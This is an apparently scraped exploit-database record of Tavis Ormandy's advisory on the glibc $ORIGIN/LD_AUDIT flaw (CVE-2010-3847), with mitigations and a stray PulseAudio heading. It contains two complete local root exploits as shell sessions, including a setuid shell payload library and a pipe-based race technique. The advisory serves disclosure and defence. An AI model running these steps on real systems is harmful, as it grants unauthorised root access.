\n \nhttp://www.cygwin.com/ml/libc-hacker/2007-07/msg00001.html \n \nI believe this is still a good idea, and LD_HWCAP_MASK is where I would bet the \nnext big loader bug is going to be, it's just not safe to let attackers have \nthat much control over the execution environment of privileged programs. \n \nFinally, some notes on ELF security for newcomers. The following common \nconditions are usually exploitable: \n \n- An empty DT_RPATH, i.e. -Wl,-rpath,\"\" \nThis is a surprisingly common build error, due to variable expansion \nfailing during the build process. \n- A relative, rather than absolute DT_RPATH. \nFor example, -Wl,-rpath,\"lib/foo\". \n \nI'll leave it as an exercise for the interested reader to explain why. Remember \nto also follow DT_NEEDED dependencies, as dependencies can also declare rpaths \nfor their dependencies, and so on. \n \n------------------- \nReferences \n----------------------- \n \n- http://man.cx/ld.so%288%29, The dynamic linker/loader, Linux Programmer's Manual. \n- http://man.cx/rtld-audit, The auditing API for the dynamic linker, Linux Programmer's Manual. \n- http://man.cx/pipe%287%29, Overview of pipes and FIFOs (Pipe Capacity), Linux Programmer's Manual. \n- Linkers and Loaders, John R. Levine, ISBN 1-55860-496-0. \n- Partitioning schemes and security, http://my.opera.com/taviso/blog/show.dml/654574 \n- CVE-2009-1894 description, http://blog.cr0.org/2009/07/old-school-local-root-vulnerability-in.html \n \nYou should subscribe to Linux Weekly News and help support their high standard \nof security journalism. \n \nhttp://lwn.net/ \n \nI have a twitter account where I occasionally comment on security topics. \n \nhttp://twitter.com/taviso \n \nex$$ \n \n-- \n------------------------------------- \ntaviso@cmpxchg8b.com | pgp encrypted mail preferred \n------------------------------------------------------- \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/94955/gnuc-origin.txt", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2022-01-13T06:50:14", "description": "", "cvss3": {}, "published": "2010-10-18T00:00:00", "type": "exploitdb", "title": "GNU C library dynamic linker - '$ORIGIN' Expansion", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1894", "CVE-2010-3847", "2011-0536", "2010-3847"], "modified": "2010-10-18T00:00:00", "id": "EDB-ID:15274", "href": "https://www.exploit-db.com/exploits/15274", "sourceData": "from: http://marc.info/?l=full-disclosure&m=128739684614072&w=2\r\n\r\nThe GNU C library dynamic linker expands $ORIGIN in setuid library search path\r\n------------------------------------------------------------------------------\r\n\r\nGruezi, This is CVE-2010-3847.\r\n\r\nThe dynamic linker (or dynamic loader) is responsible for the runtime linking of\r\ndynamically linked programs. ld.so operates in two security modes, a permissive\r\nmode that allows a high degree of control over the load operation, and a secure\r\nmode (libc_enable_secure) intended to prevent users from interfering with the\r\nloading of privileged executables.\r\n\r\n$ORIGIN is an ELF substitution sequence representing the location of the\r\nexecutable being loaded in the filesystem hierarchy. The intention is to allow\r\nexecutables to specify a search path for libraries that is relative to their\r\nlocation, to simplify packaging without spamming the standard search paths with\r\nsingle-use libraries.\r\n\r\nNote that despite the confusing naming convention, $ORIGIN is specified in a\r\nDT_RPATH or DT_RUNPATH dynamic tag inside the executable itself, not via the\r\nenvironment (developers would normally use the -rpath ld parameter, or\r\n-Wl,-rpath,$ORIGIN via the compiler driver).\r\n\r\nThe ELF specification suggests that $ORIGIN be ignored for SUID and SGID\r\nbinaries,\r\n\r\nhttp://web.archive.org/web/20041026003725/http://www.caldera.com/developers/gabi/2003-12-17/ch5.dynamic.html#substitution\r\n\r\n\"For security, the dynamic linker does not allow use of $ORIGIN substitution\r\n sequences for set-user and set-group ID programs. For such sequences that\r\n appear within strings specified by DT_RUNPATH dynamic array entries, the\r\n specific search path containing the $ORIGIN sequence is ignored (though other\r\n search paths in the same string are processed). $ORIGIN sequences within a\r\n DT_NEEDED entry or path passed as a parameter to dlopen() are treated as\r\n errors. The same restrictions may be applied to processes that have more than\r\n minimal privileges on systems with installed extended security mechanisms.\"\r\n\r\nHowever, glibc ignores this recommendation. The attack the ELF designers were\r\nlikely concerned about is users creating hardlinks to suid executables in\r\ndirectories they control and then executing them, thus controlling the\r\nexpansion of $ORIGIN.\r\n\r\nIt is tough to form a thorough complaint about this glibc behaviour however,\r\nas any developer who believes they're smart enough to safely create suid\r\nprograms should be smart enough to understand the implications of $ORIGIN\r\nand hard links on load behaviour. The glibc maintainers are some of the\r\nsmartest guys in free software, and well known for having a \"no hand-holding\"\r\nstance on various issues, so I suspect they wanted a better argument than this\r\nfor modifying the behaviour (I pointed it out a few years ago, but there was\r\nlittle interest).\r\n\r\nHowever, I have now discovered a way to exploit this. The origin expansion\r\nmechanism is recycled for use in LD_AUDIT support, although an attempt is made\r\nto prevent it from working, it is insufficient.\r\n\r\nLD_AUDIT is intended for use with the linker auditing api (see the rtld-audit\r\nmanual), and has the usual restrictions for setuid programs as LD_PRELOAD does.\r\nHowever, $ORIGIN expansion is only prevented if it is not used in isolation.\r\n\r\nThe codepath that triggers this expansion is\r\n\r\n _dl_init_paths() -> _dl_dst_substitute() -> _is_dst()\r\n\r\n(in the code below DST is dynamic string token)\r\n\r\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l741\r\n\r\n 741 /* Expand DSTs. */\r\n 742 size_t cnt = DL_DST_COUNT (llp, 1);\r\n 743 if (__builtin_expect (cnt == 0, 1))\r\n 744 llp_tmp = strdupa (llp);\r\n 745 else\r\n 746 {\r\n 747 /* Determine the length of the substituted string. */\r\n 748 size_t total = DL_DST_REQUIRED (l, llp, strlen (llp), cnt);\r\n 749\r\n 750 /* Allocate the necessary memory. */\r\n 751 llp_tmp = (char *) alloca (total + 1);\r\n 752 llp_tmp = _dl_dst_substitute (l, llp, llp_tmp, 1);\r\n 753 }\r\n\r\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l245\r\n\r\n 253 if (__builtin_expect (*name == '$', 0))\r\n 254 {\r\n 255 const char *repl = NULL;\r\n 256 size_t len;\r\n 257\r\n 258 ++name;\r\n 259 if ((len = is_dst (start, name, \"ORIGIN\", is_path,\r\n 260 INTUSE(__libc_enable_secure))) != 0)\r\n 261 {\r\n ...\r\n 267 repl = l->l_origin;\r\n 268 }\r\n\r\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l171\r\n\r\n\r\n 202 if (__builtin_expect (secure, 0)\r\n 203 && ((name[len] != '\\0' && (!is_path || name[len] != ':'))\r\n 204 || (name != start + 1 && (!is_path || name[-2] != ':'))))\r\n 205 return 0;\r\n 206\r\n 207 return len;\r\n 208 }\r\n\r\nAs you can see, $ORIGIN is only expanded if it is alone and first in the path.\r\nThis makes little sense, and does not appear to be useful even if there were\r\nno security impact. This was most likely the result of an attempt to re-use the\r\nexisting DT_NEEDED resolution infrastructure for LD_AUDIT support, accidentally\r\nintroducing this error.\r\n\r\nPerhaps surprisingly, this error is exploitable.\r\n\r\n--------------------\r\nAffected Software\r\n------------------------\r\n\r\nAt least the following versions have been tested\r\n\r\n 2.12.1, FC13\r\n 2.5, RHEL5 / CentOS5\r\n\r\nOther versions are probably affected, possibly via different vectors. I'm aware\r\nseveral versions of ld.so in common use hit an assertion in dl_open_worker, I\r\ndo not know if it's possible to avoid this.\r\n\r\n--------------------\r\nConsequences\r\n-----------------------\r\n\r\nIt is possible to exploit this flaw to execute arbitrary code as root.\r\n\r\nPlease note, this is a low impact vulnerability that is only of interest to\r\nsecurity professionals and system administrators. End users do not need\r\nto be concerned.\r\n\r\nExploitation would look like the following.\r\n\r\n# Create a directory in /tmp we can control.\r\n$ mkdir /tmp/exploit\r\n\r\n# Link to an suid binary, thus changing the definition of $ORIGIN.\r\n$ ln /bin/ping /tmp/exploit/target\r\n\r\n# Open a file descriptor to the target binary (note: some users are surprised\r\n# to learn exec can be used to manipulate the redirections of the current\r\n# shell if a command is not specified. This is what is happening below).\r\n$ exec 3< /tmp/exploit/target\r\n\r\n# This descriptor should now be accessible via /proc.\r\n$ ls -l /proc/$$/fd/3\r\nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*\r\n\r\n# Remove the directory previously created\r\n$ rm -rf /tmp/exploit/\r\n\r\n# The /proc link should still exist, but now will be marked deleted.\r\n$ ls -l /proc/$$/fd/3\r\nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)\r\n\r\n# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().\r\n$ cat > payload.c\r\nvoid __attribute__((constructor)) init()\r\n{\r\n setuid(0);\r\n system(\"/bin/bash\");\r\n}\r\n^D\r\n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c\r\n$ ls -l /tmp/exploit\r\n-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*\r\n\r\n# Now force the link in /proc to load $ORIGIN via LD_AUDIT.\r\n$ LD_AUDIT=\"\\$ORIGIN\" exec /proc/self/fd/3\r\nsh-4.1# whoami\r\nroot\r\nsh-4.1# id\r\nuid=0(root) gid=500(taviso)\r\n\r\n-------------------\r\nMitigation\r\n-----------------------\r\n\r\nIt is a good idea to prevent users from creating files on filesystems mounted\r\nwithout nosuid. The following interesting solution for administrators who\r\ncannot modify their partitioning scheme was suggested to me by Rob Holland\r\n(@robholland):\r\n\r\nYou can use bind mounts to make directories like /tmp, /var/tmp, etc., nosuid,\r\nfor example:\r\n\r\n# mount -o bind /tmp /tmp\r\n# mount -o remount,bind,nosuid /tmp /tmp\r\n\r\nBe aware of race conditions at boot via crond/atd/etc, and users with\r\nreferences to existing directories (man lsof), but this may be an acceptable\r\nworkaround until a patch is ready for deployment.\r\n\r\n(Of course you need to do this everywhere untrusted users can make links to\r\nsuid/sgid binaries. find(1) is your friend).\r\n\r\nIf someone wants to create an init script that would automate this at boot for\r\ntheir distribution, I'm sure it would be appreciated by other administrators.\r\n\r\n-------------------\r\nSolution\r\n-----------------------\r\n\r\nMajor distributions should be releasing updated glibc packages shortly.\r\n\r\n-------------------\r\nCredit\r\n-----------------------\r\n\r\nThis bug was discovered by Tavis Ormandy.\r\n\r\n-------------------\r\nGreetz\r\n-----------------------\r\n\r\nGreetz to Hawkes, Julien, LiquidK, Lcamtuf, Neel, Spoonm, Felix, Robert,\r\nAsirap, Spender, Pipacs, Gynvael, Scarybeasts, Redpig, Kees, Eugene, Bruce D.,\r\nand all my other elite friends and colleagues.\r\n\r\nAdditional greetz to the openwall guys who saw this problem coming years ago.\r\nThey continue to avoid hundreds of security vulnerabilities each year thanks to\r\ntheir insight into systems security.\r\n\r\nhttp://www.openwall.com/owl/\r\n\r\n-------------------\r\nNotes\r\n-----------------------\r\n\r\nThere are several known techniques to exploit dynamic loader bugs for suid\r\nbinaries, the fexecve() technique listed in the Consequences section above is a\r\nmodern technique, making use of relatively recent Linux kernel features (it was\r\nfirst suggested to me by Adam Langley while discussing CVE-2009-1894, but I\r\nbelieve Gabriel Campana came up with the same solution independently).\r\n\r\nThe classic UNIX technique is a little less elegant, but has the advantage that\r\nread access is not required for the target binary. It is rather common for\r\nadministrators to remove read access from suid binaries in order to make\r\nattackers work a little harder, so I will document it here for reference.\r\n\r\nThe basic idea is to create a pipe(), fill it up with junk (pipes have 2^16\r\nbytes capacity on Linux, see the section on \"Pipe Capacity\" in pipe(7) from the\r\nLinux Programmers Manual), then dup2() it to stderr. Following the dup2(),\r\nanything written to stderr will block, so you simply execve() and then make the\r\nloader print some error message, allowing you to reliably win any race\r\ncondition.\r\n\r\nLD_DEBUG has always been a a good candidate for getting error messages on\r\nLinux. The behaviour of LD_DEBUG was modified a few years ago in response to\r\nsome minor complaints about information leaks, but it can still be used with a\r\nslight modification (I first learned of this technique from a bugtraq posting\r\nby Jim Paris in 2004, http://seclists.org/bugtraq/2004/Aug/281).\r\n\r\nThe exploit flow for this alternative attack is a little more complicated, but\r\nwe can still use the shell to do it (this session is from an FC13 system,\r\noutput cleaned up for clarity).\r\n\r\n# Almost fill up a pipe with junk, then dup2() it to stderr using redirection.\r\n$ (head -c 65534 /dev/zero; LD_DEBUG=nonsense LD_AUDIT=\"\\$ORIGIN\" /tmp/exploit/target 2>&1) | (sleep 1h; cat) &\r\n[1] 26926\r\n\r\n# Now ld.so is blocked on write() in the background trying to say \"invalid\r\n# debug option\", so we are free to manipulate the filesystem.\r\n$ rm -rf /tmp/exploit/\r\n\r\n# Put exploit payload in place.\r\n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c\r\n\r\n# Clear the pipe by killing sleep, letting cat drain the contents. This will\r\n# unblock the target, allowing it to continue.\r\n$ pkill -n -t $(tty | sed 's#/dev/##') sleep\r\n-bash: line 99: 26929 Terminated sleep 1h\r\n\r\n# And now we can take control of a root shell :-)\r\n$ fg\r\nsh-4.1# id\r\nuid=0(root) gid=500(taviso)\r\n\r\nAnother technique I'm aware of is setting a ridiculous LD_HWCAP_MASK, then\r\nwhile the loader is trying to map lots of memory, you have a good chance of\r\nwinning any race. I previously found an integer overflow in this feature and\r\nsuggested adding LD_HWCAP_MASK to the unsecure vars list, however the glibc\r\nmaintainers disagreed and just fixed the overflow.\r\n\r\nhttp://www.cygwin.com/ml/libc-hacker/2007-07/msg00001.html\r\n\r\nI believe this is still a good idea, and LD_HWCAP_MASK is where I would bet the\r\nnext big loader bug is going to be, it's just not safe to let attackers have\r\nthat much control over the execution environment of privileged programs.\r\n\r\nFinally, some notes on ELF security for newcomers. The following common\r\nconditions are usually exploitable:\r\n\r\n - An empty DT_RPATH, i.e. -Wl,-rpath,\"\"\r\n This is a surprisingly common build error, due to variable expansion\r\n failing during the build process.\r\n - A relative, rather than absolute DT_RPATH.\r\n For example, -Wl,-rpath,\"lib/foo\".\r\n\r\nI'll leave it as an exercise for the interested reader to explain why. Remember\r\nto also follow DT_NEEDED dependencies, as dependencies can also declare rpaths\r\nfor their dependencies, and so on.\r\n\r\n-------------------\r\nReferences\r\n-----------------------\r\n\r\n- http://man.cx/ld.so%288%29, The dynamic linker/loader, Linux Programmer's Manual.\r\n- http://man.cx/rtld-audit, The auditing API for the dynamic linker, Linux Programmer's Manual.\r\n- http://man.cx/pipe%287%29, Overview of pipes and FIFOs (Pipe Capacity), Linux Programmer's Manual.\r\n- Linkers and Loaders, John R. Levine, ISBN 1-55860-496-0.\r\n- Partitioning schemes and security, http://my.opera.com/taviso/blog/show.dml/654574\r\n- CVE-2009-1894 description, http://blog.cr0.org/2009/07/old-school-local-root-vulnerability-in.html\r\n\r\nYou should subscribe to Linux Weekly News and help support their high standard\r\nof security journalism.\r\n\r\nhttp://lwn.net/\r\n\r\nI have a twitter account where I occasionally comment on security topics.\r\n\r\nhttp://twitter.com/taviso\r\n\r\nex$$", "sourceHref": "https://www.exploit-db.com/download/15274", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}

PulseAudio local race condition privilege escalation vulnerability

Description

Related